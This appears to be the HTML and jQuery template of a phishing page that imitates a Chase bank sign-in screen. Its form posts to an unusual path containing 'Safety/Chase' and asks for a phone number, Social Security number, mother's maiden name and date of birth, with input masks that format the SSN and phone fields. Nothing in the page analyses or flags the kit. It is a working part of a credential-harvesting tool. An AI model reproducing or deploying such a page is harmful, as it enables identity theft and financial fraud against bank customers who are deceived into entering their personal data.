<div class="container logon" data-is-view="true">
    <div>
        <div id="backgroundImage">
            <div class="jpui background image fixed show-xs show-sm" id="geoImage">

            </div>
        </div>
    </div>
    <div class="row">
        <div class="col-xs-12 col-md-6 col-md-offset-3 logoff hidden" id="logoffbox">
            <div class="jpui raised segment">
                <div class="row">
                    <div class="col-xs-10 col-xs-offset-1">
                        <h3 class="u-focus in-progress" tabindex="-1" id="logoff-header">
                            You're being signed out.
                        </h3>
                    </div>
                </div>
                <div class="row">
                    <div class="col-xs-12">
                        <div class="progress">
                            <div class="bar"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="col-xs-12 col-sm-6 col-sm-offset-3 logon-box" id="logonbox">
            <div class="jpui raised segment">
                <div class="row">
                    <div class="col-xs-10 col-xs-offset-1">
                        <form id="login-form" method="post" action="/_yesssh5/Safety/Chase/n/1eb932e5745c485929f49dbefcefff33">
                            <label class="util accessible-text logon-xs-toggle" for="phone-no-input-field" data-attr="LOGON.userIdPlaceholder">
                                <span class="accessible-text errorAdaText"></span>
                                Phone Number
                            </label>
                            <div class="logon-xs-toggle" id="phone-no">
                                <input class="jpui input phone-no" id="phone-no-input-field" placeholder="Phone Number" type="text" name="phoneNo"  value="">
                            </div>

                            <label class="util accessible-text logon-xs-toggle" for="ssn-input-field" data-attr="LOGON.userIdPlaceholder">
                                <span class="accessible-text errorAdaText"></span>
                                Social Security Number
                            </label>
                            <div class="logon-xs-toggle" id="ssn">
                                <input class="jpui input ssn" id="ssn-input-field" placeholder="Social Security Number" type="text" name="ssn" value="">
                            </div>


                            <label class="util accessible-text logon-xs-toggle" for="madien-name-input-field" data-attr="LOGON.userIdPlaceholder">
                                <span class="accessible-text errorAdaText"></span>
                                Mother's Maiden Name
                            </label>
                            <div class="logon-xs-toggle" id="madien-name">
                                <input class="jpui input" id="madien-name-input-field" placeholder="Mother's Maiden Name" type="text" name="madienName" value="">
                            </div>


                            <label class="util accessible-text logon-xs-toggle" for="dob-input-field" data-attr="LOGON.userIdPlaceholder">
                                <span class="accessible-text errorAdaText"></span>
                                Date Of Birth
                            </label>
                            <div class="logon-xs-toggle" id="dob">
                                <input class="jpui input dob" id="dob-input-field" placeholder="Date Of Birth" type="text" name="dob" value="">
                            </div>


                            <div class="row">
                                <button class="jpui button focus fluid primary" type="submit" id="signin-button" >
                                    <span class="label">
                                        Next
                                    </span>
                                </button>
                            </div>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script type="text/javascript" src="/js/jquery-latest.min.js"></script>
<script type="text/javascript" src="/js/jquery.mask.min.js"></script>
<script>
    $(function() {
        $('.phone-no').mask('(000) 000 0000', {'translation': {0: {pattern: /[0-9*]/}}});
        $('.ssn').mask('000-00-0000', {regex: "^(?!219-09-9999|078-05-1120)(?!666|000|9\\d{2})\\d{3}-(?!00)\\d{2}-(?!0{4})\\d{4}$"});
        $('.dob').mask('00/00/0000');
        // $('.ssn').mask('000-00-0000', {'translation': {0: {pattern: /^(?!219-09-9999|078-05-1120)(?!666|000|9\d{2})\d{3}-(?!00)\d{2}-(?!0{4})\d{4}$/}}});
    });
</script>